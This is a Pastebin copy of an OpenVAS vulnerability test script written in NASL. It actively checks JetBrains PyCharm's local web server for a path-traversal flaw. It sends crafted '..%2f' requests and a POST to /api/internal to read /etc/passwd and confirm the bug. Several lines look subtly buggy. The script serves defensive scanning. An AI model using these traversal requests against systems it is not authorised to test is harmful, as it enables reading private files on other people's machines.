Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###############################################################################
- # OpenVAS Vulnerability Test
- # $Id$
- #
- # JetBrains (Pycharm) Remote Code Execution and Local File Disclosure Vulnerability (Active Check)
- #
- # Authors:
- # Tameem Eissa <tameem.eissa@greenbone.net>
- #
- # Copyright:
- # Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net
- #
- # This program is free software; you can redistribute it and/or modify
- # it under the terms of the GNU General Public License version 2
- # (or any later version), as published by the Free Software Foundation.
- #
- # This program is distributed in the hope that it will be useful,
- # but WITHOUT ANY WARRANTY; without even the implied warranty of
- # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- # GNU General Public License for more details.
- #
- # You should have received a copy of the GNU General Public License
- # along with this program; if not, write to the Free Software
- # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
- ###############################################################################
- if(description)
- {
- script_oid("1.3.6.1.4.1.25623.1.0.107231");
- script_version("$Revision$");
- script_tag(name:"cvss_base", value:"5.0");
- script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
- script_tag(name:"last_modification", value:"$Date$");
- script_tag(name:"creation_date", value:"2017-08-21 10:25:40 +0530 (Mon, 21 Aug 2017)");
- script_tag(name:"qod_type", value:"exploit");
- script_name("JetBrains (Pycharm) Remote Code Execution and Local File Disclosure (Active Check)");
- script_tag(name:"summary", value:"This host is installed with Jetbrains and is prone to multiple vulnerabilities.");
- script_tag(name:"vuldetect", value:"Send a crafted request via HTTP Get and POST and
- check The response.");
- script_tag(name:"insight", value:"Multiple flaws are due to unproper escaping from the project directory.");
- script_tag(name:"impact", value:"Successful exploitation will allow
- remote attackers to read arbitrary files on the target system.
- Impact Level: System/Application");
- script_tag(name:"affected", value:"JetBrains Pycharm 2016 releases before May. Affected IDEs included also Android Studio, WebStorm, IntelliJ IDEA and several others. This check was done only for Pycharm IDE.");
- script_tag(name: "solution" , value: "Patch is available at : https://blog.jetbrains.com/blog/2016/05/11/security-update-for-intellij-based-ides-v2016-1-and-older-versions/");
- script_tag(name:"solution_type", value:"VendorFix");
- script_xref(name : "URL" , value : "http://blog.saynotolinux.com/blog/2016/08/15/jetbrains-ide-remote-code-execution-and-local-file-disclosure-vulnerability-analysis/");
- script_category(ACT_GATHER_INFO);
- script_copyright("Copyright (C) 2015 Greenbone Networks GmbH");
- script_family("Web application abuses");
- script_dependencies("find_service.nasl");
- exit(0);
- }
- include( "http_func.inc");
- include( "http_keepalive.inc");
- include( "misc_func.inc" );
- function guessProjectName ()
- {
- Dictionary = make_list(
- "ideas",
- "purescript",
- "image-analogies",
- "powerline-shell",
- "python-oauth2",
- "create",
- "jquery-boilerplate",
- "sqlbrite",
- "foresight.js",
- "iOS-Core-Animation-Advanced-Techniques",
- "elemental",
- "peek",
- "TheAmazingAudioEngine",
- "orientdb",
- "testing");
- foreach name (Dictionary)
- {
- url = "/" + name + "/.idea/workspace.xml";
- req = http_get_req( port: port, url: url, data: data, add_headers: make_array( 'Content-Type', 'application/xml', 'Connection', 'keep-alive' ) );
- res = http_keepalive_send_recv( port: port, data: req );
- if ( res =~ "HTTP/1.. 200" )
- {
- break;
- }
- }
- if ( !isnull( name ) ) return name;
- }
- function buildDotsSegsToRoot( path )
- {
- i = 0;
- depth = 0;
- while (i < strlen( projectPath ) )
- {
- if ( projectPath[i] == "/" )
- depth += 1;
- i = i + 1;
- }
- for ( i = 0; i < depth; i = i + 1 )
- {
- dotSegs += "..%2f";
- }
- return dotSegs;
- }
- function leakWithPyCharmHelpers( res )
- {
- homePath = eregmatch( pattern: 'homePath": "(.*)"', string: res);
- homePath = homePath[1];
- projectName = "helpers";
- projectPath = homePath + "/helpers";
- url = "/api/internal";
- data = '{"url": "jetbrains://whatever/open//' + projectPath + '"}' ;
- req = http_post_req(port: port, url: url, data: data, add_headers: make_array( 'Content-Type', 'application/x-www-form-urlencoded', 'Connection', 'keep-alive' ) );
- res = http_keepalive_send_recv( port: port, data: req );
- dotSegs = buildDotsSegsToRoot( path: projectPath);
- url = "/helpers" + "/" + dotSegs + "etc/passwd";
- req = http_get_req( port: port, url: url, data: data, add_headers: make_array( 'Content-Type', 'application/xml', 'Connection', 'keep-alive' ) );
- res = http_keepalive_send_recv( port: port, data: req, bodyonly: TRUE );
- if ( res =~ "HTTP/1.. 200 OK" && egrep( pattern: ".*root:.*:0:[01]:.*", string: res ) )
- {
- security_message( port:port, data:report );
- }
- }
- function leakWithProject(name)
- {
- dotSegs = "";
- for ( i = 1; i < 5; i = i + 1 )
- {
- dotSegs += "..%2f";
- url = "/" + name + "/" + dotSegs + "etc/passwd";
- if (http_vuln_check(port: port, url: url, pattern: "root:.*:0:[01]:", check_header: TRUE, debug: TRUE))
- {
- report = report_vuln_url( port:port, url:url ) + '\n\n';
- report += string( "Here are the contents of the file '/etc/passwd' that\n",
- "OpenVAS was able to read from the remote host :\n",
- "\n", res );
- return report;
- }
- }
- }
- for ( port = 63342; port < 63352; port = port + 1){
- if ( get_port_state ( port) ){
- break;
- }
- }
- if ( ! get_port_state ( port ) ) exit ( 0 );
- random = rand_str( length: 13, charset: "0123456789" );
- url = "/api/about?more-true?a=" + random;
- req = http_get_req( port: port, url: url, data: data, add_headers: make_array( 'Content-Type', 'application/xml', 'Connection', 'keep-alive' ) );
- res = http_keepalive_send_recv( port: port, data: req );
- if ( ! res >< "PayCharm" ) exit ( 0 );
- configPath = eregmatch( pattern: 'configPath": "(.*)config",', string: res );
- if ( ! isnull ( configPath ) )
- {
- configPath = configPath[ 1 ] + "config";
- Report = leakWithPyCharmHelpers( res );
- }
- else
- {
- ProjectName = guessProjectName();
- if ( ! isnull( ProjectName ) )
- {
- Report = leakWithProject( name: ProjectName );
- }
- }
- if ( isnull ( Report ) ) exit ( 0 );
- security_message( port:port, data:Report );
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement